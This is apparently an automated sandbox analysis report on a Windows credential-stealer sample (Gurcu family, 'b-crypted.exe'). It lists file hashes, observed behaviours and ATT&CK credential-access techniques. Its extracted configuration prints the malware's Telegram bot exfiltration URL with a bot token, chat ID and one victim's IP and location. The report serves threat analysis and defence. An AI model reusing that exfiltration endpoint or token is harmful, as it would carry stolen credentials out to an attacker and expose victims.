General
-
Target
b-crypted.exe
-
Size
8.4MB
-
Sample
241207-w4qp1ssrbr
-
MD5
b45f3a137a961c8498ee21a246e983ec
-
SHA1
f7a2dc2bac844aad018498f224adf51f285c1f1b
-
SHA256
17cc88b4f9976d16cc5c807e91b034fecc721f9988cc52e2056a01e99aabc900
-
SHA512
ee339e5f4853c425d838493aa9fdac55273601482b804be183367118832d4677375daa46e08755d1f472725cb9d35612e570095f1afffe3db1d336fb139d20bc
-
SSDEEP
196608:HWIWSNScyO62XEXOV7QUY1MlROz8Uk2Ew2GdKxvY7n7wls8bg:NWSBybi7qelRc8UFAGwxAGs80
Static task
static1
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6031927554:AAEXTw-Bhx5o5i_JojmzmJzXPmNMBfive_Y/sendDocument?chat_id=918093463&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Targets
-
-
Target
b-crypted.exe
-
Size
8.4MB
-
MD5
b45f3a137a961c8498ee21a246e983ec
-
SHA1
f7a2dc2bac844aad018498f224adf51f285c1f1b
-
SHA256
17cc88b4f9976d16cc5c807e91b034fecc721f9988cc52e2056a01e99aabc900
-
SHA512
ee339e5f4853c425d838493aa9fdac55273601482b804be183367118832d4677375daa46e08755d1f472725cb9d35612e570095f1afffe3db1d336fb139d20bc
-
SSDEEP
196608:HWIWSNScyO62XEXOV7QUY1MlROz8Uk2Ew2GdKxvY7n7wls8bg:NWSBybi7qelRc8UFAGwxAGs80
-
Gurcu family
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Loads dropped DLL
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates processes with tasklist
-
Suspicious use of SetThreadContext
-
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1